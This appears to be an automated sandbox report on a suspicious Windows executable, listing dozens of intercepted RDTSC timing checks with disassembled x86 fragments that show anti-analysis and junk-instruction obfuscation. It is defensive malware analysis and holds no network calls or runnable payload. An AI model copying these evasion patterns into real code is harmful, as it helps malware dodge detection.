Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DC952 second address: 10DC9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jng 00007FD2CC8277E6h 0x00000012 jno 00007FD2CC8277E6h 0x00000018 popad 0x00000019 jo 00007FD2CC8277E8h 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jo 00007FD2CC8277FAh 0x0000002a push eax 0x0000002b jmp 00007FD2CC8277F2h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 jmp 00007FD2CC8277F2h 0x0000003d push eax 0x0000003e push edx 0x0000003f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DC9AB second address: 10DC9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DC9B0 second address: 10DC9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DFA0B second address: 10DFA2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CCE08508h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jnl 00007FD2CCE084F6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10DFBBF second address: 10DFBFC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FD2CC8277F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007FD2CC8277EBh 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop eax 0x00000016 jno 00007FD2CC8277ECh 0x0000001c pushad 0x0000001d jbe 00007FD2CC8277E6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E02C3 second address: 10E0308 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2CCE084F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FD2CCE08506h 0x00000010 je 00007FD2CCE084F6h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 popad 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD2CCE08505h 0x00000022 push eax 0x00000023 pop eax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E0478 second address: 10E048E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E26C0 second address: 10E26CA instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2CCE084FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E2EC6 second address: 10E2ED8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD2CC8277E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E2ED8 second address: 10E2EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E2EDC second address: 10E2EFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007FD2CC8277E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E2F96 second address: 10E2FAC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FD2CCE084FEh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E336A second address: 10E336E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E38B8 second address: 10E393A instructions: 0x00000000 rdtsc 0x00000002 je 00007FD2CCE084F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007FD2CCE084FAh 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push eax 0x00000015 call 00007FD2CCE084F8h 0x0000001a pop eax 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc eax 0x00000028 push eax 0x00000029 ret 0x0000002a pop eax 0x0000002b ret 0x0000002c sub si, B6FCh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007FD2CCE084F8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000018h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d push 00000000h 0x0000004f mov esi, dword ptr [ebp+122D2F30h] 0x00000055 push eax 0x00000056 push ecx 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FD2CCE08508h 0x0000005e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E4240 second address: 10E4246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E412E second address: 10E4142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE08500h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E51C8 second address: 10E51E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD2CC8277E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FD2CC8277ECh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E51E5 second address: 10E51F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CCE08500h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E677B second address: 10E677F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E677F second address: 10E6783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E6783 second address: 10E67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FD2CC8277E8h 0x0000000c popad 0x0000000d mov dword ptr [esp], eax 0x00000010 sub dword ptr [ebp+122D19F2h], edi 0x00000016 push 00000000h 0x00000018 mov si, 292Eh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FD2CC8277E8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 xor edi, dword ptr [ebp+122D1AEAh] 0x0000003e push eax 0x0000003f pushad 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FD2CC8277F1h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E67DD second address: 10E67E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E71ED second address: 10E71FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2CC8277EDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E71FF second address: 10E7277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FD2CCE084F8h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jl 00007FD2CCE084FCh 0x0000002a mov dword ptr [ebp+122D2770h], ecx 0x00000030 pushad 0x00000031 mov edx, 10E236B1h 0x00000036 mov si, cx 0x00000039 popad 0x0000003a push 00000000h 0x0000003c mov edi, dword ptr [ebp+122D2801h] 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push ebp 0x00000047 call 00007FD2CCE084F8h 0x0000004c pop ebp 0x0000004d mov dword ptr [esp+04h], ebp 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc ebp 0x0000005a push ebp 0x0000005b ret 0x0000005c pop ebp 0x0000005d ret 0x0000005e push eax 0x0000005f push eax 0x00000060 push edx 0x00000061 jmp 00007FD2CCE084FEh 0x00000066 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E7C6E second address: 10E7CE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FD2CC8277EDh 0x00000014 popad 0x00000015 pop edx 0x00000016 nop 0x00000017 cmc 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push esi 0x0000001d call 00007FD2CC8277E8h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], esi 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc esi 0x00000030 push esi 0x00000031 ret 0x00000032 pop esi 0x00000033 ret 0x00000034 mov si, E061h 0x00000038 push 00000000h 0x0000003a movsx edi, bx 0x0000003d xchg eax, ebx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FD2CC8277F9h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E86AC second address: 10E8737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FD2CCE084F8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 call 00007FD2CCE08501h 0x0000002a jnl 00007FD2CCE08508h 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007FD2CCE084F8h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d add dword ptr [ebp+122D38B2h], edx 0x00000053 xchg eax, ebx 0x00000054 jc 00007FD2CCE08504h 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d pop eax 0x0000005e rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10E8737 second address: 10E873B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10ABB1A second address: 10ABB1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10ED9B6 second address: 10ED9BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10ED9BC second address: 10ED9C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F014D second address: 10F01A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FD2CC8277E8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007FD2CC8277E8h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov di, DFE1h 0x00000042 xchg eax, esi 0x00000043 push eax 0x00000044 push edx 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 pop edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F01A5 second address: 10F01AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F11D7 second address: 10F11DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F02BC second address: 10F02D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FD2CCE084F6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FD2CCE084F6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F3227 second address: 10F32A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a ja 00007FD2CC8277E9h 0x00000010 mov bx, di 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ebp 0x00000018 call 00007FD2CC8277E8h 0x0000001d pop ebp 0x0000001e mov dword ptr [esp+04h], ebp 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebp 0x0000002b push ebp 0x0000002c ret 0x0000002d pop ebp 0x0000002e ret 0x0000002f add bl, FFFFFF93h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FD2CC8277E8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 00000017h 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e jmp 00007FD2CC8277F3h 0x00000053 xchg eax, esi 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 push eax 0x00000058 pop eax 0x00000059 jmp 00007FD2CC8277EBh 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F429F second address: 10F42F1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 adc di, 4FB4h 0x0000000d push 00000000h 0x0000000f pushad 0x00000010 call 00007FD2CCE08504h 0x00000015 pop eax 0x00000016 mov eax, dword ptr [ebp+122D2BBAh] 0x0000001c popad 0x0000001d push 00000000h 0x0000001f jmp 00007FD2CCE084FEh 0x00000024 mov edi, dword ptr [ebp+12446275h] 0x0000002a push eax 0x0000002b pushad 0x0000002c jmp 00007FD2CCE084FAh 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F33E9 second address: 10F33F3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2CC8277ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F4455 second address: 10F445A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F7570 second address: 10F757A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FD2CC8277ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F9487 second address: 10F948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F948C second address: 10F949C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD2CC8277ECh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F76E5 second address: 10F76E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FA627 second address: 10FA684 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bx, di 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007FD2CC8277E8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 add dword ptr [ebp+122D3434h], ecx 0x0000002f xor dword ptr [ebp+122D3414h], ebx 0x00000035 push 00000000h 0x00000037 jmp 00007FD2CC8277EBh 0x0000003c xchg eax, esi 0x0000003d pushad 0x0000003e push ecx 0x0000003f pushad 0x00000040 popad 0x00000041 pop ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push ecx 0x00000045 pop ecx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F8642 second address: 10F8648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F65A4 second address: 10F65A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F96D3 second address: 10F96D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F76E9 second address: 10F76EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F96D7 second address: 10F96DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F8742 second address: 10F8748 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FA848 second address: 10FA866 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2CCE08504h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F96DD second address: 10F96E2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10F8748 second address: 10F8752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FD2CCE084F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FB5F3 second address: 10FB5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FD495 second address: 10FD499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FB705 second address: 10FB709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FB709 second address: 10FB70F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 10FDC7E second address: 10FDC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1100E70 second address: 1100E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1105B91 second address: 1105BA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD2CC8277EEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 1105488 second address: 11054A2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FD2CCE084FDh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11055E4 second address: 11055E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11055E8 second address: 11055F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11055F2 second address: 11055F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 11055F8 second address: 11055FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B3DF second address: 110B3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B3E5 second address: 110B3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FD2CCE084F6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B3F2 second address: 110B406 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD2CC8277E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B406 second address: 110B419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c jc 00007FD2CCE084F6h 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B419 second address: 110B431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2CC8277EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B431 second address: 110B437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110B437 second address: 110B43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111071B second address: 111071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 111071F second address: 111073A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD2CC8277F1h 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\1w5RpHuliE.exe	RDTSC instruction interceptor: First address: 110F9C7 second address: 110F9CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
